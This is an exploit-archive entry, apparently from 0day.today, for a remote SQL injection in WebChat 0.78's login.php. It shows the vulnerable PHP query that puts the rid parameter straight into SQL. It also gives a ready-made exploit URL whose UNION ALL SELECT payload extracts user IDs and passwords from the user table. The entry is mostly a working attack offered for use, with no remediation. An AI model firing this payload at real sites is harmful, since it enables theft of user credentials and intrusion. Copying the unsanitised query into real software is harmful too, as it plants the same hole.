WebChat 0.78 (login.php rid) Remote SQL Injection Vulnerability

2007-06-28T00:00:00
ID 1337DAY-ID-1987
Type zdt
Reporter R00t[ATI]
Modified 2007-06-28T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
WebChat 0.78 (login.php rid) Remote SQL Injection Vulnerability
===============================================================



#########################################################################
#
#               [webchat 0.78]
#
# Class:     SQL Injection
# Published  28/06/2007
# Remote:    Yes
# Critical   Level : Dangerous
# Site:      http://sourceforge.net/projects/webdev-webchat/
# Download:  http://downloads.sourceforge.net/webdev-webchat/webchat-078.zip?modtime=1046649600&big_mirror=0
# Author:    R00T[ATI]
# Contact:   [email protected] - http://inclusionhunter.altervista.org/index.php
#
#########################################################################


               Vulnerable code:
               login.php
======================================================
<?
       $q = new DB_Chat;
       $q->query("select * from room where rid='$rid'");
       if ($q->next_record()) {
?>
=======================================================

               Exploit :
============================================================================================================
http://www.site.com/[web_chat]/login.php?rid=-1'%20UNION%20ALL%20SELECT%20uid,pass,null,null,null%20from%20user%20WHERE%20uid=1/*
============================================================================================================



#  0day.today [2018-02-20]  #